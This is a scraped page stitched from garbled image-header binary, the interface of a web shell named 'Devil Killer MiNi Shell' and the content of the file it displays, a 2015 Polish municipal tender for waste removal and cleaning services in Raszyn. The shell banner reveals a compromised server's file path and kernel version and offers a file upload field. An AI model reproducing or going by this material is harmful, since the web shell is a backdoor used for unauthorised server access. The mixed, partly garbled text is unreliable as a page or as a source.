JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150116/11412-N-2015.html

<p class="kh_header"><b>Raszyn: Utrzymanie czystości na terenie Gminy Raszyn w roku 2015/2016</b><br>
<b>Numer ogłoszenia: 11412 - 2015; data zamieszczenia: 16.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raszyn , ul. Szkolna 2a, 05-090 Raszyn, woj. mazowieckie, tel. 022 7017770, faks 022 7017778.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.raszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości na terenie Gminy Raszyn w roku 2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: utrzymanie czystości na terenie Gminy Raszyn w roku 2015/2016
z podziałem na zadania:
Zadanie nr 1 obejmuje:
a) Wywóz nieczystości stałych z terenu Urzędu Gminy Raszyn wraz z odbiorem odpadów zebranych selektywnie;
b) Utrzymanie czystości na przystankach autobusowych zlokalizowanych w granicach Gminy Raszyn wraz z usuwaniem odpadów z koszy betonowych z wkładami metalowymi o poj. 45 l; 
c) Usuwanie i utylizacja odpadów z koszy ulicznych o poj. 45 - 50 l, 70 l oraz opróżnianie koszy ulicznych na psie odchody o poj. 50 l;
d) Usuwanie zwłok bezdomnych zwierząt z terenu Gminy Raszyn
- Wykaz przystanków autobusowych objętych usługą zawiera załącznik nr 1.
- Wykaz koszy ulicznych objętych usługą zawiera załącznik nr 2.
Na zadanie składa się wykonanie czynności:
w zakresie ad. a)
- podstawianie pojemników ich opróżnianie i wywóz w zakresie nieczystości stałych z terenu Urzędu Gminy, tj.:
- 2 kontenery o poj. 7m3 - nie mniej niż 8 razy w miesiącu, opróżnianych na zgłoszenie telefoniczne Zamawiającego;
- 2 pojemników do segregacji odpadów w tym:
1 pojemnik o poj. 1 100 l koloru żółtego (na papier, tworzywa sztuczne i metale), 
1 pojemnik o poj. 240 l koloru białego (na szkło i opakowania szklane)
Opróżnianych raz na dwa tygodnie
w zakresie ad. b)
1/ sprzątanie i wywóz nieczystości z przystanków autobusowych zlokalizowanych w granicach Gminy Raszyn tj.:
- 67 szt. przystanków autobusowych wraz z opróżnianiem koszy betonowych z wkładami metalowymi o poj. 45l (w ilości 62 szt.):
- 17 szt. przystanków - 4 razy w tygodniu,
- 50 przystanków - 3 razy w tygodniu
2/ mycie wiat przystankowych zlokalizowanych w granicach Gminy Raszyn - 47 szt. - 1 raz w miesiącu,
w zakresie ad. c)
1/ opróżnianie i wywóz śmieci z koszy ulicznych o pojemności 45 l oraz 50 l, tj:
- 26 szt. ulicznych koszy betonowych z wkładami metalowymi - 3 razy w tygodniu,
2/ opróżnianie koszy ulicznych o pojemności 70l,
- 31 szt. ulicznych koszy betonowych z wkładami metalowymi - 3 razy w tygodniu
3/ opróżnianie koszy na psie odchody o pojemności 50l 
- 13 szt. - 3 razy w tygodniu. 
w zakresie ad. d)
1/ usuwanie zwłok bezdomnych zwierząt wraz z ich utylizacją z terenu Gminy Raszyn, 
- ok. 20 szt. w trakcie trwania umowy - na zgłoszenie telefoniczne Zamawiającego.

Wykaz przystanków autobusowych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 1.1,
Wykaz koszy ulicznych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 1.2.

Zadanie nr 2 obejmuje:
Wywóz nieczystości płynnych z obiektów komunalnych Gminy Raszyn w zakresie 
a) wywozu nieczystości płynnych z obiektów mieszkalnych komunalnych Gminy Raszyn (w tym jednego wolnostojącego WC),
b) wywóz nieczystości płynnych obiektu Ochotniczej Straży Pożarnej w Falentach. 
Szacowana łączna ilość wywożonych nieczystości ciekłych wynosi - 1 188m3 w okresie trwania umowy.
Wykaz obiektów komunalnych objętych usługą zawiera - załącznik nr 2.1.

Zadanie nr 3 obejmuje:
Ustawienie wraz z serwisem przenośnych kabin sanitarnych (toalety WC) Zakres obejmuje: 
- postawienie wraz z serwisowaniem i utrzymaniem w czystości 3 sztuk kabin sanitarnych (WC) w wyznaczonych przez Zamawiającego miejscach.
Kabiny sanitarne (WC) zostaną postawione:
- teren parku Nad Raszynką w Raszynie - dwie toalety,
- teren placu zabaw dla dzieci przy ul. Wybickiego w Raszynie - jedna toaleta.
Zamawiający wymaga, aby serwisowanie kabin odbywało się 3 razy w tygodniu.
Szacunkowa ilość opróżnień kabin sanitarnych - 288 razy.
- postawienie wraz z serwisowaniem i utrzymaniem w czystości 5 sztuk kabin sanitarnych (WC) - (okolicznościowo, jednorazowo) w dniu 6 sierpnia 2015 r. na terenie Kościoła w Raszynie.

Zadanie nr 4 obejmuje:
Odbiór i wywóz nieczystości stałych z terenu jednostek organizacyjnych Gminy Raszyn
Zakres obejmuje: 
- postawienie, opróżnienia oraz wywóz nieczystości stałych z terenu jednostek organizacyjnych Gminy Raszyn,
- zapewnienie pojemników oraz kontenerów przeznaczonych do zbierania odpadów stałych.
Częstotliwość opróżniania i rodzaj pojemników:
- 1 kontener o poj. 7m3 - opróżniany 1 raz w tygodniu,
- 15 pojemników 1100 l - opróżniany średnio 1 razy w tygodniu,
- 7 pojemników 1100 l - opróżnianych średnio 2 razy w miesiącu,
- 1 pojemniki 1100 l - opróżnianych średnio 2 razy w tygodniu,
- 5 pojemniki 240l - opróżniany 1 raz w tygodniu,
- 2 pojemniki 240l - opróżniany średnio 2 razy w miesiącu,
- 3 pojemniki 110l - opróżniane 1 raz w tygodniu,
- 50 szt. worków 120 l - na odpady zielone w okresie maj - wrzesień.
Wykaz jednostek organizacyjnych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 4.1.

Zadanie nr 5 obejmuje:
Usuwanie wyrobów zawierających azbest
Zakres obejmuje: 
- odbiór, transport i utylizacja odpadów zawierających azbest pochodzący z pokryć dachowych budynków położonych na terenie Gminy Raszyn.
Szacunkowa ilość odpadów do wywiezienia w trakcie trwania umowy - 123 000kg.

Zadanie nr 6 obejmuje:
Likwidacja dzikich wysypisk na terenie Gminy Raszyn oraz wywóz kontenerów z odpadami po wiosennych porządkach z terenu osiedla Falenty
Zakres obejmuje: 
- zbieranie, załadunek oraz wywóz odpadów nielegalnie wyrzucanych - stanowiących tzw. dzikie wysypiska. Teren po zebraniu odpadów należy uporządkować. 
Szacunkowa ilość odpadów do wywiezienia - 2 613,91m3/ rok. 
- zbieranie, załadunek oraz wywóz kontenerów z odpadami po wiosennych porządkach z terenu osiedla Falenty.
Szacunkowa ilość odpadów pochodzących z wiosennych porządków - 46,29m3/ rok..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega możliwość udzielenia zamówień uzupełniających w okresie 3 lat od dnia zawarcia umowy (w zakresie zadania nr 5 i 6) w wysokości do 50% zamówienia podstawowego, przewidzianych w art. 67 ust. 1 pkt. 7 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013, poz. 907 z późn. zm.) polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 5 000,00 zł (pięć tysięcy złotych) 
Zadanie nr 2 - 500,00 zł (pięćset złotych)
Zadanie nr 3 - nie jest wymagane,
Zadanie nr 4 - 1 000,00 zł (jeden tysiąc złotych 
Zadanie nr 5 - 1 000,00 zł (jeden tysiąc złotych) 
Zadanie nr 6 - 3 000,00 zł (trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku, Wykonawca winien wykazać, że posiada odpowiednio:
- aktualne na czas realizacji usługi zaświadczenie o wpisie do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Raszyn w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości - podstawa prawna: art.9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj.: Dz. U. z 2013 r., poz. 1399 z póź. zm.) - w przypadku składania oferty na zadanie nr 1 lub zadanie nr 4 lub zadanie nr 6;
- aktualne na czas realizacji usługi zezwolenie na zbieranie i transport odpadów - podstawa prawna: Ustawa z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity: Dz. U. z 2010 r., Nr. 185, poz. 1243 z póź zm., lub zezwolenie na zbieranie odpadów - podstawa prawna: Ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 z póź. zm.) lub zaświadczenie o wpisie rejestru o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach - w przypadku składania oferty na zadanie nr 1 lub zadanie nr 4 lub zadanie nr 6;
(Decyzje wydane na podstawie wcześniejszych przepisów pozostają ważne na czas, na jaki zostały wydane, lecz nie dłużej niż na 2 lata od dnia wejścia w życie nowej ustawy o odpadach (licząc od dnia 23 stycznia 2013r .) za wyjątkiem pozwolenia zintegrowanego obejmującego wytwarzanie i gospodarowanie odpadami, które zachowują ważność na czas, na jaki zostały wydane).,
- aktualną umowę ze składowiskiem odpadów i/lub z uprawnionym podmiotem/mi prowadzącym/mi odzysk, tym recykling odpadów - w przypadku składania oferty na zadanie nr 1 lub zadanie nr 4 lub zadanie nr 6;
- aktualną umowę z oczyszczalnią ścieków na przekazywanie nieczystości płynnych - w przypadku składania oferty na zadanie nr 2 lub zadanie nr 3;
- aktualną umowę ze składowiskiem odpadów na przekazanie odpadów, których nie można odzyskać - w przypadku składania oferty na zadanie nr 6; 
- aktualne na czas realizacji usługi zezwolenie Wójta Gminy Raszyn na prowadzenie działalności w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości płynnych - podstawa prawna: ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2013 r. poz. 1399 z późn. zm.) - w przypadku składania oferty na zadanie nr 2 lub zadanie nr 3;
- aktualną aktualne zezwolenie na prowadzenie działalności polegającej na odbiorze i transporcie odpadów niebezpiecznych zawierających azbest wydane na podstawie ustawy z dnia 27 kwietnia 2001 roku o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243, późn. zm.), w związku z art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21) lub zaświadczenie o wpisie do rejestru, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach - dot. zadania nr 5;
- aktualną umowę ze składowiskiem odpadów posiadającym odpowiednie zezwolenie na unieszkodliwiane odpadów zawierających azbest - w przypadku składania oferty na zadanie nr 5;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie spełniania warunku dotyczącego wiedzy i doświadczenia Zamawiający określa minimalne wymagania wskazując, iż Wykonawca powinien wykazać się wykonaniem głównych usług w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i przedmiotu, na rzecz których usługi zostały wykonane oraz z załączeniem dowodów (poświadczeń) dotyczących najważniejszych usług, określających czy usługi zostały wykonane należycie w tym co najmniej:
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. polegającej na odbiorze stałych odpadów komunalnych o wartości, nie mniejszej niż 100 000,00 zł brutto każde z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - w przypadku składania oferty na zadanie nr 1;
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. związane z odbiorem nieczystości płynnych o wartości nie mniejszej niż 5 000,00 zł każe z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców- w przypadku składania oferty na zadanie nr 2;
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. związane z wynajmem i serwisem kabin przenośnych o wartości nie mniejszej niż 1 000,00 zł każe z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców- w przypadku składania oferty na zadanie nr 3;
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. polegającej na odbiorze stałych odpadów komunalnych o wartości nie mniejszej niż 1 000,00 zł każe z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców- w przypadku składania oferty na zadanie nr 4;
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. polegającej zbieraniu i transporcie odpadów niebezpiecznych w tym odpadów zawierających azbest, o wartości nie mniejszej niż 20 000,00 zł każe z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - w przypadku składania oferty na zadanie nr 5;
2 (dwa) zamówienia (wykonane/ wykonywane należycie) odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. związane z likwidacją dzikich wysypisk o wartości nie mniejszej niż 40 000,00 zł każe z zamówień z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców- w przypadku składania oferty na zadanie nr 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy powinna zawierać:
a)	wypełniony formularz oferty (oryginał) ,
b)	pełnomocnictwo (oryginał lub notarialnie poświadczona kopia) do reprezentowania wykonawcy w postępowaniu i złożenia oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności w dokumentach rejestracyjnych lub w przypadku oferty składanej przez Wykonawców występujących wspólnie, pełnomocnictwo dla osoby podpisującej w ich imieniu ofertę (oryginał lub kopia notarialnie poświadczona) - załącznik Wykonawcy,
c)	dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu, określone w rozdziale VI SIWZ,
d)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, zgodnie z art. 36b ust. 1 ustawy oraz dołączenia w takim przypadku wykazu usług, które Wykonawca zamierza powierzyć Podwykonawcom /wypełniany w przypadku wykonywania usług przez Podwykonawców wg wzoru stanowiącego załącznik nr 6 do SIWZ.
e)	informacyjnie kserokopia dokumentu potwierdzającego wniesienie wadium - załącznik Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności faktury - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy.
1. Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy. 
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian w przypadku: 
1). zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia, 
2). zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. 
3). zmiany obowiązującej stawki VAT - jeżeli zmiana ta będzie powodować zwiększenie kosztów po stronie Wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku zapłaconego przez Wykonawcę, 
4). zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy. 
3.Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych: 
a). zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np. zmiana rachunku bankowego, 
b). zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między stronami. 
2.Wszelkie zmiany postanowień niniejszej Umowy wymagają zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.raszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 05-090 Raszyn, ul. Szkolna 2A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2015 godzina 10:30, miejsce: siedziba Zamawiającego:
05-090 Raszyn, ul. Szkolna 2A
Biuro Obsługi Mieszkańców, parter pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 
Wywóz nieczystości stałych z terenu Urzędu Gminy Raszyn wraz z odbiorem odpadów zebranych selektywnie....</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 obejmuje:
a) Wywóz nieczystości stałych z terenu Urzędu Gminy Raszyn wraz z odbiorem odpadów zebranych selektywnie;
b) Utrzymanie czystości na przystankach autobusowych zlokalizowanych w granicach Gminy Raszyn wraz z usuwaniem odpadów z koszy betonowych z wkładami metalowymi o poj. 45 l; 
c) Usuwanie i utylizacja odpadów z koszy ulicznych o poj. 45 - 50 l, 70 l oraz opróżnianie koszy ulicznych na psie odchody o poj. 50 l;
d) Usuwanie zwłok bezdomnych zwierząt z terenu Gminy Raszyn
